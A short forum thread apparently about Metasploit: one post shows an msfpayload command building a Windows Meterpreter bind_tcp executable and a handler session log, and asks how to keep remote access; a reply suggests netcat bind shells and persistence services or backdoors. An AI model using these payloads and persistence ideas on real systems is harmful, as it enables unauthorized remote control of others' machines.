Results 1 to 2 of 2

Thread: Meterpreter ... HOWTO disconnect from session without exiting meterpreter proccess

Hybrid View

  1. #1
    Just burned his ISO
    Join Date
    Mar 2009
    Posts
    4

    Default Meterpreter ... HOWTO disconnect from session without exiting meterpreter proccess

    Meterpreter ... HOWTO disconnect from session without exiting meterpreter remote proccess...

    I created payload...
    Code:
    msfpayload windows/meterpreter/bind_tcp LPORT=4444 X > bind.exe
    after that connected from msfconsole

    Code:
    msf > use exploit/multi/handler
    msf exploit(handler) > set PAYLOAD windows/meterpreter/bind_tcp
    PAYLOAD => windows/meterpreter/bind_tcp
    msf exploit(handler) > set LPORT 4444
    LPORT => 4444
    msf exploit(handler) > set RHOST 127.0.0.1
    RHOST => 127.0.0.1
    msf exploit(handler) > exploit
    [*] Starting the payload handler...[*] Started bind handler[*] Transmitting intermediate stager for over-sized stage...(191 bytes)[*] Sending stage (2650 bytes)[*] Sleeping before handling stage...[*] Uploading DLL (75787 bytes)...[*] Upload completed.[*] Meterpreter session 1 opened (127.0.0.1:1234 -> 127.0.0.1:4444)
    
    meterpreter > help
    but I d like to know howto disconnect from remote meterpreter without exiting proccess on remote machine?

    scenario: connected to meterpreter > need restart on pc (running msfconsole) > restarted, lets run msfconsole and setup > cant connect because, meterpreter shutdowned

    additional question: is there any way how to control mererpreter other than through msfconsole... i mean something more portable... like netcat... because if i want use remote meterpreter i must install ruby, metasploit, setup handler (not much quick)

  2. #2
    Just burned his ISO
    Join Date
    Apr 2009
    Posts
    3

    Default

    I believe that once you disconnect from a Meterpreter session, you can not reconnect.

    The easiest thing to do in this situation, is to simply bind a shell to a port using NetCat or a similar technology. From there you can always create a payload using the Metasploit tools and run them from that command line to get Meterpreter again.

    At one point, I read about a Meterpreter service that you could install to the remote PC as well to keep control.

    Typically this is the role of a backdoor/rootkit, whereas Metasploit is usually used for penetration.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •